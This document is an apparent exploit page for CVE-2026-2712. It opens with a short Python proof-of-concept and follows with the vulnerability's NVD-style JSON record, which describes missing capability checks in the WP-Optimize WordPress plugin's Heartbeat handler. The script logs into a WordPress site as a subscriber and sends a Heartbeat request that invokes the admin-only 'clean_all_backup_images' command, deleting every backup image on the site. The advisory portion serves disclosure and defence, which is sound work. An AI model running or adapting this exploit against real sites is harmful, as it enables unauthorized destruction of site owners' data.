CVE-2026-2712

import requests # Target configuration target_url = "https://example.com/wp-admin/admin-ajax.php" username = "subscriber" password = "password" # 1. Authenticate to get cookies session = requests.Session() login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "https://example.com/wp-admin/" } login_resp = session.post("https://example.com/wp-login.php", data=login_data) if login_resp.status_code == 200: print("[+] Logged in successfully") # 2. Craft the malicious Heartbeat request # Exploiting 'clean_all_backup_images' command heartbeat_data = { "action": "heartbeat", "screen_id": "settings_page_wp-optimize-smush", "has_focus": "true", "data": { "wp_optimize_smush": "command", "command": "clean_all_backup_images" # Vulnerable command } } # 3. Send the request response = session.post(target_url, data=heartbeat_data) if response.status_code == 200: print("[+] Exploit sent successfully") print(f"[+] Response: {response.text}") else: print("[-] Login failed")

{"cve": {"id": "CVE-2026-2712", "sourceIdentifier": "[email protected]", "published": "2026-04-10T02:16:02.913", "lastModified": "2026-04-24T18:01:58.517", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP-Optimize plugin for WordPress is vulnerable to unauthorized access of functionality due to missing capability checks in the `receive_heartbeat()` function in `includes/class-wp-optimize-heartbeat.php` in all versions up to, and including, 4.5.0. This is due to the Heartbeat handler directly invoking `Updraft_Smush_Manager_Commands` methods without verifying user capabilities, nonce tokens, or the allowed commands whitelist that the normal AJAX handler (`updraft_smush_ajax`) enforces. This makes it possible for authenticated attackers, with Subscriber-level access and above, to invoke admin-only Smush operations including reading log files (`get_smush_logs`), deleting all backup images (`clean_all_backup_images`), triggering bulk image processing (`process_bulk_smush`), and modifying Smush options (`update_smush_options`)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.4.1/includes/class-wp-optimize-heartbeat.php#L65", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.4.1/includes/class-wp-optimize-heartbeat.php#L82", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-optimize/trunk/includes/class-wp-optimize-heartbeat.php#L65", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2026-2712/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6a0a376e-ea3a-40ca-9341-f28f92e15e02?source=cve", "source": "[email protected]"}]}}